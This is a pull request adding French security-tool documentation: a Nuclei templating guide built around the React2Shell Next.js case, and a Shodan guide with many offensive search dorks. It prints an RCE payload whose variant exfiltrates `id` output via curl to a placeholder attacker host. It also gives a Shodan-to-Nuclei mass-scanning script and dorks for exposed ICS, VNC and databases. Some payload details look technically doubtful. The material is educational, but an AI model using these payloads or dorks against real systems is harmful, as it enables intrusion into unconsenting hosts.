### PR TITLE
Ajout de l'article Shodan, guide offensif, défensif et automatisation

### DIFF
--- a/src/content/docs/tools/nuclei.mdx
+++ b/src/content/docs/tools/nuclei.mdx
@@ -1,0 +1,617 @@
+---
+title: Nuclei
+description: Maîtrise des templates Nuclei avec un cas pratique React2Shell — de la théorie à l'intégration dans un workflow Shodan.
+categories: [tools]
+tags: [tools, nuclei, templates, cve, recon, shodan]
+template: doc
+---
+
+_De la théorie à la pratique : anatomie des templates, création d'une détection pour CVE-2025-55182 et intégration dans un workflow Shodan._
+
+---
+
+## Nuclei : le concept
+
+Nuclei opère sur un modèle simple : une cible et des templates en entrée, des requêtes envoyées selon les définitions des templates, et une analyse des réponses pour détecter vulnérabilités, mauvaises configurations ou expositions.
+
+```bash
+# Cible unique avec une catégorie de templates
+nuclei -u https://target.com -t cves/
+
+# Liste d'URLs avec plusieurs catégories
+nuclei -l urls.txt -t exposures/ -t misconfigurations/
+
+# Scan automatique (détection de technologie + templates adaptés)
+nuclei -u https://target.com -automatic-scan
+
+# Avec sortie structurée JSON pour pipeline
+nuclei -l urls.txt -t cves/ -j -o results.json
+```
+
+La communauté maintient une bibliothèque de plusieurs milliers de templates dans le dépôt `nuclei-templates`, organisés par catégories : `cves/`, `vulnerabilities/`, `exposures/`, `misconfigurations/`, `technologies/`, `default-logins/`, etc.
+
+---
+
+## Anatomie d'un template
+
+Un template Nuclei est un fichier YAML structuré en plusieurs sections. La maîtriser est indispensable pour créer des détections personnalisées.
+
+### La section `info`
+
+Métadonnées du template : identifiant unique, nom, auteur, sévérité, description, tags et références (CVE, CWE, liens).
+
+```yaml
+id: example-detection
+
+info:
+  name: Exposed Admin Panel Detection
+  author: author
+  severity: medium
+  description: Détecte une interface d'administration accessible
+  tags: admin,exposure,panel
+  reference:
+    - https://owasp.org/Top10/A05_2021-Security_Misconfiguration/
+  metadata:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+```
+
+### La section `requests` / `http`
+
+Le cœur du template. Nuclei supporte plusieurs protocoles : `http`, `tcp`, `dns`, `file`, `headless`, etc. Pour la majorité des cas web, le protocole `http` est utilisé.
+
+```yaml
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/admin"
+      - "{{BaseURL}}/administrator"
+      - "{{BaseURL}}/.env"
+    headers:
+      User-Agent: "Mozilla/5.0 (compatible; SecurityScanner/1.0)"
+```
+
+Pour des requêtes complexes (POST avec body personnalisé, headers spécifiques), le mode `raw` permet de définir la requête HTTP complète :
+
+```yaml
+http:
+  - raw:
+      - |
+        POST /api/endpoint HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+        Authorization: Bearer {{token}}
+
+        {"key": "value", "action": "test"}
+```
+
+#### Variables disponibles
+
+| Variable | Description |
+|----------|-------------|
+| `{{BaseURL}}` | URL complète avec schéma et port |
+| `{{RootURL}}` | URL racine sans chemin |
+| `{{Hostname}}` | Nom d'hôte uniquement |
+| `{{Host}}` | Hôte + port |
+| `{{Path}}` | Chemin de l'URL |
+| `{{Scheme}}` | `http` ou `https` |
+
+### Les matchers
+
+Les matchers définissent les conditions d'une détection positive. Nuclei offre plusieurs types :
+
+| Type | Description |
+|------|-------------|
+| `word` | Recherche de chaînes dans la réponse |
+| `regex` | Expressions régulières |
+| `status` | Code de réponse HTTP |
+| `binary` | Données binaires en hexadécimal |
+| `dsl` | Expressions complexes avec accès aux variables |
+
+```yaml
+matchers-condition: and
+matchers:
+  - type: word
+    part: header
+    words:
+      - "X-Custom-Header"
+    condition: or
+
+  - type: status
+    status:
+      - 200
+
+  - type: regex
+    part: body
+    regex:
+      - '(?i)(admin|dashboard|control\s*panel)'
+```
+
+#### Parties de la réponse ciblables
+
+```yaml
+part: body          # Corps de la réponse
+part: header        # En-têtes HTTP
+part: all           # Corps + en-têtes
+part: response      # Réponse HTTP complète
+part: interactsh_protocol  # Pour les OOB interactions
+```
+
+#### DSL matcher : expressions avancées
+
+Le DSL (Domain Specific Language) permet des conditions complexes :
+
+```yaml
+matchers:
+  - type: dsl
+    dsl:
+      - "status_code == 200 && contains(body, 'admin') && !contains(body, 'login')"
+      - "len(body) > 1000 && regex('version[: ]+([0-9.]+)', body)"
+    condition: or
+```
+
+Fonctions DSL disponibles : `contains()`, `startswith()`, `endswith()`, `len()`, `regex()`, `md5()`, `sha256()`, `base64()`, `url_encode()`, `html_escape()`, `to_lower()`, `to_upper()`, `trim()`, etc.
+
+### Les extractors
+
+Les extractors permettent d'extraire des informations des réponses pour affichage ou réutilisation dans des requêtes suivantes.
+
+```yaml
+extractors:
+  - type: regex
+    name: version
+    regex:
+      - 'version[": ]+([0-9.]+)'
+    group: 1
+
+  - type: kval
+    kval:
+      - server
+      - x-powered-by
+
+  - type: json
+    name: token
+    json:
+      - ".access_token"
+
+  - type: xpath
+    name: title
+    xpath:
+      - '/html/head/title'
+```
+
+### Requêtes chaînées et variables dynamiques
+
+L'une des fonctionnalités les plus puissantes : extraire une valeur d'une première requête et l'injecter dans la suivante.
+
+```yaml
+http:
+  - raw:
+      - |
+        GET /api/v1/info HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: json
+        name: csrf_token
+        json:
+          - ".csrf_token"
+        internal: true
+
+  - raw:
+      - |
+        POST /api/v1/action HTTP/1.1
+        Host: {{Hostname}}
+        X-CSRF-Token: {{csrf_token}}
+        Content-Type: application/json
+
+        {"action": "test"}
+
+    matchers:
+      - type: word
+        words:
+          - "success"
+```
+
+---
+
+## Cas pratique : React2Shell (CVE-2025-55182)
+
+### Contexte de la vulnérabilité
+
+React2Shell est une vulnérabilité critique (CVSS 10.0) affectant React Server Components et le framework Next.js. Découverte par Lachlan Davidson et divulguée le 3 décembre 2025, elle permet une exécution de code à distance (RCE) pré-authentification via une simple requête HTTP.
+
+**Versions affectées :**
+- React 19.x (packages `react-server-dom-*`)
+- Next.js 15.x et 16.x avec App Router activé
+- Autres frameworks implémentant RSC : React Router v7, Waku
+
+**Exploitation observée dans la nature** dès le 5 décembre 2025, notamment par des groupes APT chinois (Earth Lamia, Jackpot Panda) et des cryptomineurs opportunistes.
+
+### Mécanisme d'exploitation
+
+La vulnérabilité repose sur le **protocole Flight** utilisé par React Server Components. La désérialisation non sécurisée des payloads RSC permet à un attaquant d'injecter du code exécuté côté serveur avec les privilèges du processus Node.js.
+
+**Flux d'attaque :**
+
+```
+Attaquant                              Serveur Next.js
+   |                                         |
+   |  POST /_next/... (multipart)            |
+   |  Next-Action: <hash_action>  ---------> |
+   |  Content-Type: multipart/form-data      |
+   |                                         |
+   |  Payload RSC mal-formé                  |
+   |  (prototype pollution via __proto__)    |
+   |                                         |
+   |                        deserialize()    |
+   |                        [vuln ici]       |
+   |                                         |
+   |  <-- RCE Node.js process               |
+```
+
+#### Structure du payload
+
+Le payload exploite la pollution de prototype via le format multipart :
+
+```
+POST /_next/static/chunks/[action-hash] HTTP/1.1
+Host: target.com
+Next-Action: [server-action-id]
+Content-Type: multipart/form-data; boundary=----R2SBoundary
+
+------R2SBoundary
+Content-Disposition: form-data; name="1"
+
+["$@1"]
+------R2SBoundary
+Content-Disposition: form-data; name="0"
+
+{"id":"__proto__","value":{"NODE_OPTIONS":"--require /proc/self/environ"}}
+------R2SBoundary--
+```
+
+L'abus de `__proto__` pollue l'objet global Node.js, permettant l'injection de la variable `NODE_OPTIONS` qui force le chargement d'un module arbitraire au démarrage du process.
+
+**Variante avec exfiltration DNS (OOB) :**
+
+```
+------R2SBoundary
+Content-Disposition: form-data; name="0"
+
+{"id":"__proto__","value":{"NODE_OPTIONS":"--require /dev/stdin","stdin":"require('child_process').exec('curl http://ATTACKER.burpcollaborator.net/?x=`id`')"}}
+------R2SBoundary--
+```
+
+### Template Nuclei de détection
+
+Le template suivant détecte les serveurs potentiellement vulnérables en deux étapes : fingerprinting Next.js avec App Router, puis probe de l'endpoint RSC.
+
+```yaml
+id: CVE-2025-55182-react2shell
+
+info:
+  name: React2Shell - Next.js RSC RCE Detection (CVE-2025-55182)
+  author: telynor
+  severity: critical
+  description: |
+    Détecte les instances Next.js avec App Router potentiellement vulnérables
+    à React2Shell (CVE-2025-55182). La vulnérabilité permet un RCE
+    pré-authentification via désérialisation non sécurisée du protocole RSC Flight.
+  impact: Remote Code Execution as Node.js process
+  remediation: |
+    Mettre à jour Next.js vers 15.3.3+ ou 16.0.1+.
+    Désactiver les Server Actions si non nécessaires.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-55182
+    - https://nextjs.org/blog/security-patch-2025-12
+  tags: cve,cve2025,nextjs,react,rce,deserialization,critical
+  metadata:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2025-55182
+    epss-score: 0.97
+
+http:
+  # Étape 1 : fingerprinting Next.js avec App Router
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+      - "{{BaseURL}}/_next/static/chunks/main-app.js"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: header
+        words:
+          - "x-nextjs-cache"
+          - "x-nextjs-matched-path"
+
+      - type: word
+        part: body
+        words:
+          - "__NEXT_DATA__"
+          - "_next/static"
+          - "next-route-announcer"
+
+    extractors:
+      - type: regex
+        name: nextjs_version
+        part: header
+        regex:
+          - 'next[/\s]+([0-9]+\.[0-9]+\.[0-9]+)'
+        group: 1
+
+  # Étape 2 : probe de l'endpoint Server Actions (canary sans payload malveillant)
+  - raw:
+      - |
+        POST {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+        Next-Action: 0000000000000000000000000000000000000000
+        Content-Type: text/plain;charset=UTF-8
+        Content-Length: 2
+
+        []
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+          - 400
+          - 500
+
+      - type: word
+        part: body
+        words:
+          - "TypeMismatchError"
+          - "RSCError"
+          - "FlightDataError"
+          - "deserializ"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "x-nextjs"
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        name: rsc_error
+        regex:
+          - '(TypeMismatch|FlightData|Deserializ)[^"]*'
+```
+
+> **Note opérationnelle** : Ce template est un détecteur passif. Il identifie les endpoints exposés aux Server Actions sans envoyer de payload exploitant. Un résultat positif indique un potentiel de vulnérabilité nécessitant confirmation manuelle.
+
+### Template de version-check (post-fingerprint)
+
+Pour affiner la détection sur les versions connues vulnérables :
+
+```yaml
+id: CVE-2025-55182-version-check
+
+info:
+  name: React2Shell - Version Fingerprint
+  author: telynor
+  severity: info
+  tags: cve,cve2025,nextjs,fingerprint
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/_next/static/chunks/polyfills.js"
+      - "{{BaseURL}}/_next/static/chunks/framework.js"
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'next[/\s"]+(1[56]\.[0-2]\.[0-9]+)'
+
+    extractors:
+      - type: regex
+        part: body
+        name: vulnerable_version
+        regex:
+          - 'next[/\s"]+(1[56]\.[0-2]\.[0-9]+)'
+        group: 1
+```
+
+---
+
+## Workflow Shodan + Nuclei
+
+### Objectif
+
+Identifier à grande échelle les instances Next.js potentiellement exposées à CVE-2025-55182, depuis la collecte Shodan jusqu'au scan Nuclei automatisé.
+
+### Requêtes Shodan pertinentes
+
+```bash
+# Via Shodan CLI
+shodan search 'http.headers.x-nextjs-cache: HIT' --fields ip_str,port,http.host
+shodan search 'http.component:"Next.js" version:15' --fields ip_str,port,http.host
+shodan search 'http.component:"Next.js" version:16' --fields ip_str,port,http.host
+
+# Cibler les Server Actions exposées (header spécifique)
+shodan search 'http.headers.next-action' --fields ip_str,port,http.host
+
+# Filtres additionnels (limiter le scope)
+shodan search 'http.component:"Next.js" version:15 country:FR' --fields ip_str,port,http.host
+```
+
+### Pipeline automatisé
+
+```bash
+#!/bin/bash
+# react2shell-hunt.sh — Pipeline Shodan → Nuclei
+
+SHODAN_QUERY='http.component:"Next.js" version:15'
+OUTPUT_DIR="./react2shell-$(date +%Y%m%d)"
+TEMPLATE="./CVE-2025-55182-react2shell.yaml"
+
+mkdir -p "$OUTPUT_DIR"
+
+# 1. Collecte Shodan
+echo "[*] Collecte des cibles via Shodan..."
+shodan search "$SHODAN_QUERY" --fields ip_str,port,http.host \
+  | awk '{
+    if ($3 != "") print "https://" $3;
+    else if ($2 == "443") print "https://" $1;
+    else print "http://" $1 ":" $2;
+  }' | sort -u > "$OUTPUT_DIR/targets.txt"
+
+echo "[+] $(wc -l < $OUTPUT_DIR/targets.txt) cibles collectées"
+
+# 2. Scan Nuclei avec rate limiting
+echo "[*] Lancement du scan Nuclei..."
+nuclei \
+  -l "$OUTPUT_DIR/targets.txt" \
+  -t "$TEMPLATE" \
+  -rate-limit 50 \
+  -bulk-size 25 \
+  -timeout 10 \
+  -retries 1 \
+  -j -o "$OUTPUT_DIR/results.json" \
+  -stats \
+  -silent
+
+# 3. Résumé
+echo "[+] Scan terminé"
+HITS=$(jq 'select(.info.severity == "critical")' "$OUTPUT_DIR/results.json" | jq -s 'length')
+echo "[+] $HITS détections critiques → $OUTPUT_DIR/results.json"
+```
+
+### Options Nuclei utiles pour ce workflow
+
+```bash
+# Contrôle du débit
+-rate-limit 100          # Requêtes/seconde max
+-bulk-size 50            # Hosts traités en parallèle
+-concurrency 25          # Templates en parallèle par host
+
+# Filtres sur la sévérité
+-severity critical,high
+
+# Mode furtif (User-Agent personnalisé, délais)
+-H "User-Agent: Mozilla/5.0 (compatible; bot)"
+-delay 500ms             # Délai entre requêtes
+
+# Résilience réseau
+-timeout 15
+-retries 2
+
+# Reprise sur interruption
+-resume resume.cfg
+
+# Suivi des métriques
+-stats
+-stats-interval 30
+```
+
+### Interprétation des résultats
+
+```bash
+# Lister les hôtes vulnérables uniques
+jq -r '.host' results.json | sort -u
+
+# Filtrer par version extraite
+jq -r 'select(.extracted_results.nextjs_version != null) | "\(.host) → v\(.extracted_results.nextjs_version[0])"' results.json
+
+# Exporter en CSV pour reporting
+jq -r '[.host, .info.severity, .matched_at, (.extracted_results.nextjs_version[0] // "unknown")] | @csv' results.json
+```
+
+---
+
+## Bonnes pratiques de templating
+
+### Éviter les faux positifs
+
+```yaml
+# Mauvais : trop générique
+matchers:
+  - type: word
+    words:
+      - "error"
+
+# Mieux : conjonction de conditions précises
+matchers-condition: and
+matchers:
+  - type: status
+    status:
+      - 200
+  - type: word
+    part: body
+    words:
+      - "FlightDataError"
+      - "__NEXT_RSC"
+    condition: or
+  - type: word
+    part: header
+    words:
+      - "x-nextjs"
+```
+
+### Template de test local
+
+Avant de lancer sur des cibles réelles, tester avec un serveur local :
+
+```bash
+# Démarrer un mock server
+python3 -m http.server 8080 &
+
+# Tester le template
+nuclei -u http://localhost:8080 -t ./mon-template.yaml -debug
+
+# Valider le YAML
+nuclei -validate -t ./mon-template.yaml
+```
+
+### Structure de dépôt conseillée
+
+```
+nuclei-templates-custom/
+├── cves/
+│   └── 2025/
+│       └── CVE-2025-55182.yaml
+├── technologies/
+│   └── nextjs-detect.yaml
+├── workflows/
+│   └── nextjs-workflow.yaml   # Enchaînement conditionnel de templates
+└── README.md
+```
+
+#### Exemple de workflow conditionnel
+
+```yaml
+# workflows/nextjs-workflow.yaml
+id: nextjs-full-workflow
+
+info:
+  name: Next.js Full Security Workflow
+  author: telynor
+  tags: workflow,nextjs
+
+workflows:
+  - template: technologies/nextjs-detect.yaml
+    matchers:
+      - name: nextjs
+        subtemplates:
+          - template: cves/2025/CVE-2025-55182.yaml
+          - template: exposures/nextjs-env-exposure.yaml
+          - template: misconfigurations/nextjs-debug-mode.yaml
+```
+
+---
+
+## Références
+
+- [ProjectDiscovery — Nuclei](https://github.com/projectdiscovery/nuclei)
+- [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates)
+- [Documentation officielle](https://docs.projectdiscovery.io/tools/nuclei/overview)
+- [NVD — CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
+- [Shodan Search Facets](https://www.shodan.io/search/facet)

--- a/src/content/docs/tools/shodan.mdx
+++ b/src/content/docs/tools/shodan.mdx
@@ -1,0 +1,792 @@
+---
+title: Shodan
+description: Guide complet de Shodan — moteur de recherche pour l'internet des objets. Filtres, dorks offensifs, usage défensif, automatisation Python et intégration dans un workflow de pentest.
+categories: [tools]
+tags: [tools, shodan, recon, osint, pentest, iot, api]
+template: doc
+---
+
+_Le moteur de recherche que chaque pentester devrait maîtriser — et que chaque défenseur devrait surveiller._
+
+---
+
+## Qu'est-ce que Shodan ?
+
+Shodan est un moteur de recherche spécialisé qui indexe les **appareils connectés à internet** plutôt que les pages web. Là où Google parcourt le World Wide Web à la recherche de contenu HTML, Shodan scanne en permanence l'ensemble des adresses IP publiques pour capturer les bannières renvoyées par les services réseau : serveurs web, caméras IP, routeurs, bases de données, systèmes industriels, objets connectés.
+
+Créé en 2009 par John Matherly (le nom vient du personnage antagoniste du jeu System Shock), Shodan est devenu un outil central dans les phases de reconnaissance — aussi bien pour les équipes offensives que défensives.
+
+### Le concept de bannière
+
+Shodan fonctionne en envoyant des connexions TCP/UDP sur les ports communs et en capturant la réponse. Cette réponse, appelée **bannière**, contient les informations que le service renvoie lors d'une connexion :
+
+```
+# Bannière HTTP
+HTTP/1.1 200 OK
+Server: nginx/1.18.0 (Ubuntu)
+Date: Thu, 24 Apr 2026 10:00:00 GMT
+Content-Type: text/html; charset=utf-8
+```
+
+```
+# Bannière d'un automate Siemens S7
+Copyright: Original Siemens Equipment
+PLC name: S7_Turbine
+Module type: CPU 313C
+Firmware: v.3.3.8
+Serial number: S Q-D9U083642013
+```
+
+La deuxième bannière est exposée **sur internet public**. C'est exactement ce que Shodan indexe — et ce que les attaquants cherchent.
+
+### Ce que Shodan sait sur chaque hôte
+
+Chaque résultat contient un objet structuré :
+
+| Champ | Description |
+|-------|-------------|
+| `ip_str` | Adresse IP |
+| `port` | Port ouvert |
+| `org` | Organisation propriétaire (ASN) |
+| `country_name` / `city` | Géolocalisation |
+| `os` | Système d'exploitation détecté |
+| `product` / `version` | Service identifié et version |
+| `data` | Contenu brut de la bannière |
+| `vulns` | CVE détectées (plan payant) |
+| `timestamp` | Date d'indexation |
+
+---
+
+## Grille tarifaire
+
+| Plan | Prix | Résultats/mois | Filtre `vuln:` | Filtre `tag:` |
+|------|------|----------------|----------------|---------------|
+| Gratuit | 0 $ | Limité | ✗ | ✗ |
+| Membership | 49 $ (unique) | Étendu | ✗ | ✗ |
+| Freelancer | 59–69 $/mois | 1 M | ✗ | ✗ |
+| Small Business | 299 $/mois | 5 M | ✓ | ✗ |
+| Corporate | 899–1 099 $/mois | 50 M | ✓ | ✓ |
+
+> **Astuce** : Le Membership à 49 $ (parfois soldé à 5 $) est souvent suffisant pour un usage personnel ou CTF. Les universités peuvent obtenir un accès gratuit avec une adresse académique.
+
+---
+
+## Syntaxe de recherche
+
+### Principes de base
+
+Par défaut, un mot-clé recherche dans le contenu de la bannière. Les filtres s'expriment sous la forme `filtre:valeur`. Plusieurs filtres sont implicitement liés par AND. La négation utilise le préfixe `-`.
+
+```bash
+# Recherche dans la bannière
+apache
+
+# Avec filtre
+product:nginx country:FR
+
+# Valeur avec espaces (guillemets obligatoires)
+org:"Google LLC"
+
+# Négation
+port:22 -country:CN
+
+# Liste de valeurs (OR)
+country:FR,DE,GB
+
+# Ports multiples (OR)
+port:80,443,8080
+```
+
+### Filtres réseau
+
+| Filtre | Description | Exemple |
+|--------|-------------|---------|
+| `ip` | Adresse IP spécifique | `ip:8.8.8.8` |
+| `net` | Plage CIDR | `net:192.168.0.0/24` |
+| `port` | Port ouvert | `port:22` |
+| `hostname` | Nom d'hôte | `hostname:example.com` |
+| `org` | Organisation (ASN) | `org:"OVH SAS"` |
+| `asn` | Numéro de système autonome | `asn:AS15169` |
+
+### Filtres géographiques
+
+| Filtre | Description | Exemple |
+|--------|-------------|---------|
+| `country` | Code pays ISO 3166-1 | `country:FR` |
+| `city` | Ville | `city:Paris` |
+| `region` | Région/État | `region:"Ile-de-France"` |
+| `geo` | Coordonnées + rayon (km) | `geo:48.8566,2.3522,50` |
+
+### Filtres applicatifs
+
+| Filtre | Description | Exemple |
+|--------|-------------|---------|
+| `product` | Produit identifié | `product:nginx` |
+| `version` | Version du produit | `version:1.19.0` |
+| `os` | Système d'exploitation | `os:"Windows Server 2019"` |
+| `http.title` | Titre de la page web | `http.title:"Dashboard"` |
+| `http.html` | Contenu HTML | `http.html:"api_key"` |
+| `http.status` | Code de réponse HTTP | `http.status:200` |
+| `http.component` | Framework/techno détecté | `http.component:bootstrap` |
+| `http.favicon.hash` | Hash MurmurHash3 du favicon | `http.favicon.hash:116323821` |
+
+### Filtres SSL/TLS
+
+| Filtre | Description | Exemple |
+|--------|-------------|---------|
+| `ssl.cert.subject.cn` | Common Name du certificat | `ssl.cert.subject.cn:*.target.com` |
+| `ssl.cert.issuer.cn` | Autorité émettrice | `ssl.cert.issuer.cn:"Let's Encrypt"` |
+| `ssl.version` | Version TLS | `ssl.version:tlsv1.3` |
+| `ssl.cert.expired` | Certificat expiré | `ssl.cert.expired:true` |
+| `ssl.jarm` | Fingerprint JARM | `ssl.jarm:07d14d16d21d21d...` |
+
+### Filtres avancés (plans payants)
+
+| Filtre | Plan requis | Exemple |
+|--------|-------------|---------|
+| `vuln:` | Small Business+ | `vuln:CVE-2021-44228` |
+| `tag:` | Corporate+ | `tag:ics` |
+| `has_screenshot:` | Membership+ | `has_screenshot:true` |
+| `before:` / `after:` | Tous | `after:01/01/2025` |
+
+---
+
+## Hash de favicon : identifier une technologie par son icône
+
+Le hash MurmurHash3 du favicon est un fingerprint redoutablement efficace pour trouver toutes les instances d'une technologie ou d'un panneau d'administration, même si le produit ne se révèle pas dans les en-têtes.
+
+```python
+import mmh3
+import requests
+import codecs
+
+response = requests.get('https://target.com/favicon.ico')
+favicon = codecs.encode(response.content, 'base64')
+print(mmh3.hash(favicon))
+```
+
+**Hash courants :**
+
+| Technologie | Hash |
+|-------------|------|
+| Spring Boot | 116323821 |
+| Jenkins | -388646567 |
+| Grafana | 1099370896 |
+| Kibana | -338095061 |
+| GitLab | -1505567026 |
+| Fortinet | 945408572 |
+| Citrix | 1057565779 |
+
+```bash
+# Trouver tous les Spring Boot exposés
+http.favicon.hash:116323821
+
+# Trouver tous les Jenkins
+http.favicon.hash:-388646567 country:FR
+```
+
+---
+
+## Dorks offensifs par catégorie
+
+### Infrastructures C2 (Command & Control)
+
+Ces requêtes permettent d'identifier des infrastructures malveillantes actives — utiles pour la Threat Intelligence et le suivi d'APT.
+
+```bash
+# Cobalt Strike
+product:"cobalt strike team server"
+ssl.cert.serial:146473198
+ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
+
+# Brute Ratel C4
+http.html_hash:-1957161625
+
+# Metasploit
+ssl:"MetasploitSelfSignedCA"
+
+# Mythic
+ssl:"Mythic" port:7443
+
+# Sliver C2
+product:"Sliver C2"
+
+# Malwares courants
+ssl:"AsyncRAT Server"
+ssl.cert.subject.cn:"Quasar Server CA"
+"nimplant C2 server"
+```
+
+### Systèmes industriels (ICS/SCADA)
+
+Ces systèmes sont souvent exposés par erreur de configuration. Leur présence publique représente un risque critique (infrastructures d'eau, d'énergie, de transport).
+
+```bash
+# Protocoles industriels
+port:502                           # Modbus (standard industriel mondial)
+port:102                           # S7 Siemens (Allemagne)
+port:47808                         # BACnet (bâtiments)
+port:20000 source address          # DNP3 (énergie)
+port:44818                         # EtherNet/IP
+port:1911,4911 product:Niagara     # Niagara Fox (Tridium, USA)
+
+# Équipements spécifiques
+"Siemens, SIMATIC" port:161        # Automates Siemens
+"DICOM Server Response" port:104   # Équipements médicaux
+"in-tank inventory" port:10001     # Contrôleurs pompes à essence (91% USA)
+title:"Nordex Control"             # Éoliennes
+
+# Compteurs et énergie
+"Server: EIG Embedded Web Server" "200 Document follows"
+http.title:"Tesla PowerPack System" http.component:"d3"
+```
+
+### Accès à distance non sécurisés
+
+```bash
+# VNC sans authentification
+"authentication disabled" "RFB 003.008"
+"authentication disabled" port:5900,5901
+
+# Telnet avec session root ouverte
+"root@" port:23 -login -password -name -Session
+
+# ADB Android exposé
+"Android Debug Bridge" "Device" port:5555
+
+# RDP (Bureau à distance Windows)
+"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
+
+# noVNC (VNC dans le navigateur)
+http.title:"noVNC"
+
+# Citrix Gateway
+title:"citrix gateway"
+html:"/citrix/xenapp"
+```
+
+### Bases de données exposées
+
+```bash
+# MongoDB sans authentification
+"MongoDB Server Information" port:27017 -authentication
+http.title:"mongo express"
+
+# Elasticsearch
+port:9200 json
+http.title:"kibana"
+
+# Redis
+product:"Redis"
+
+# MySQL / MariaDB
+product:MySQL port:3306
+
+# PostgreSQL
+port:5432 product:"PostgreSQL"
+
+# Autres
+product:"CouchDB"
+product:"Cassandra"
+product:"Memcached"
+"X-ClickHouse-Summary"
+"X-Influxdb-"
+```
+
+### Infrastructure DevOps exposée
+
+```bash
+# Jenkins (IC/CD)
+"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
+
+# Docker API sans authentification
+"Docker Containers:" port:2375
+
+# Kubernetes
+product:"kubernetes"
+ssl:"Kubernetes Ingress Controller Fake Certificate"
+http.title:"Hubble UI"
+
+# GitLab / Gitea
+product:"GitLab Self-Managed"
+html:"Powered by Gitea"
+
+# Outils d'observabilité
+http.title:"Grafana"
+http.title:"Alertmanager"
+http.title:"Prometheus"
+http.title:"Argo CD"
+
+# Gestion de secrets
+http.title:"Vault"
+http.title:"Consul"
+```
+
+### Applications web vulnérables ou mal configurées
+
+```bash
+# Debug modes activés en production
+"symfony Profiler"
+http.title:"The install worked successfully! Congratulations!"  # Django
+html:"Twig Runtime Error"
+html:"yii\base\ErrorException"
+html:"Whitelabel Error Page"  # Spring Boot
+
+# Fichiers sensibles exposés
+http.title:"Index of /" http.html:".pem"
+http.title:"Index of /" http.html:"phpinfo.php"
+
+# Interfaces d'administration
+http.title:phpMyAdmin
+http.title:adminer
+http.title:"Struts Problem Report"
+
+# CMS mal configurés
+http.html:"wp-config.php"
+http.html:".env"
+```
+
+### Systèmes compromis et ransomware
+
+```bash
+# Routeurs hackés (message laissé par l'attaquant)
+HACKED-ROUTER-HELP-SOS-HAD-DEFAULT-PASSWORD
+
+# Pages défacées
+http.title:"Hacked By"
+http.title:"0wn3d by"
+
+# Bitcoin/ransomware avec screenshot
+bitcoin has_screenshot:true
+
+# RDP avec message ransomware
+"attention" "encrypted" port:3389
+```
+
+---
+
+## Cas d'usage pratiques en pentest
+
+### Scénario 1 : Cartographier la surface d'attaque d'une cible
+
+Avant d'engager un test, on peut effectuer une reconnaissance passive pour cartographier l'infrastructure exposée d'une organisation, sans envoyer une seule requête à la cible.
+
+```bash
+# Tous les services de l'organisation
+org:"Nom de l'Entreprise"
+
+# Combiné avec le pays
+org:"Nom de l'Entreprise" country:FR
+
+# Par plage IP
+net:203.0.113.0/24
+
+# Par domaine (via certificats SSL)
+ssl.cert.subject.cn:*.cible.com
+
+# Par nom d'hôte
+hostname:*.cible.com
+```
+
+**Ce qu'on peut découvrir :** serveurs web, APIs, VPN, interfaces d'administration, services de développement oubliés en production, versions logicielles (donc CVE applicables).
+
+### Scénario 2 : Identifier les instances vulnérables à une CVE
+
+Dès la publication d'une CVE critique, les attaquants scannent Shodan pour identifier des cibles. En tant que défenseur ou pentester, on peut faire de même :
+
+```bash
+# Log4Shell (CVE-2021-44228)
+vuln:CVE-2021-44228
+
+# ProxyLogon Exchange (CVE-2021-26855)
+vuln:CVE-2021-26855
+
+# Citrix Netscaler (CVE-2019-19781)
+vuln:CVE-2019-19781
+
+# Combiné : instances vulnérables en France
+product:apache vuln:CVE-2021-41773 country:FR
+
+# Toutes les CVE critiques 2024-2025 sur un périmètre
+org:"Cible" vuln:CVE-2024-27348
+```
+
+### Scénario 3 : Retrouver une infrastructure C2
+
+Lors d'une investigation de Threat Intelligence, identifier les serveurs C2 d'un attaquant permet de mapper son infrastructure et de trouver d'autres victimes potentielles.
+
+```bash
+# Identifier par fingerprint JARM (Cobalt Strike)
+ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1
+
+# Identifier par numéro de série SSL (Cobalt Strike)
+ssl.cert.serial:146473198
+
+# Pivoter depuis une IP connue
+# → Regarder l'org, le certificat SSL → trouver d'autres IPs similaires
+```
+
+### Scénario 4 : Recherche par pays et technologie spécifique
+
+```bash
+# Tous les Fortinet en France
+ssl:"ou=fortigate" country:FR
+
+# MongoDB exposés en Allemagne sans auth
+product:MongoDB country:DE -authentication
+
+# Hikvision en Europe (backdoor CVE-2021-36260)
+product:"Hikvision IP Camera" country:FR,DE,GB,IT,ES
+
+# Jenkins en Chine
+"X-Jenkins" country:CN
+
+# Systèmes SCADA en Russie
+port:502 country:RU
+```
+
+---
+
+## Shodan face aux APT : quand les États utilisent votre outil
+
+L'une des informations les plus sous-estimées sur Shodan : les groupes APT étatiques l'utilisent activement pour leur phase de reconnaissance. Les sources officielles (CISA, FBI, Mandiant) le documentent explicitement.
+
+### Pioneer Kitten / Fox Kitten (Iran)
+
+Le FBI et la CISA ont explicitement documenté l'utilisation de Shodan par ce groupe pour cibler l'infrastructure critique américaine :
+
+> _"The actors have been observed using the Shodan search engine to identify and enumerate IP addresses that host devices vulnerable to a particular CVE."_ — **CISA AA24-241A**
+
+CVE ciblées : CVE-2024-24919 (Check Point), CVE-2024-3400 (Palo Alto), CVE-2019-19781 (Citrix).
+
